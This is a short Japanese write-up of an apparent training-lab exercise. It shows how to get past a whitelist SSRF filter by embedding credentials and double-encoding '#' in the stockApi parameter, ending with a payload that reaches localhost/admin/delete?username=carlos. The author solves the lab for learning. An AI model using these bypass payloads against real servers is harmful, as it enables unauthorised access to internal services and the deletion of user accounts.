Hello there, ('ω')ノ
ホワイトリストベースの入力フィルターを備えたSSRFを。
インターセプトして、stockApiを確認してリピータへ。
まずは、stockApiを下記に変更するとレスポンスから受け入れられているようで。
つまり、URLパーサが埋め込み情報をサポートしているということで。
http://username@stock.weliketoshop.net/
次に#を追加すると拒否されて。
http://username#@stock.weliketoshop.net/
#をダブルエンコードして。
再度、#を置き換えてリクエストしてみると。
さきほどとは変わって、内部サーバエラーのレスポンスが。
よって、adminを追加して実行してみると管理者のページが。
stockApi=http://localhost:80%25%32%33@stock.weliketoshop.net/admin
インターセプトにもどって、stockApiのパラメータを変更してオフにして。
開発ツールで、Deleteのリンクを確認して。
/admin/delete?username=carlos
下記のようにstockApiを変更して実行すると。
stockApi=http://localhost:80%25%32%33@stock.weliketoshop.net/admin/delete?username=carlos
クリアできた。
Best regards, (^^ゞ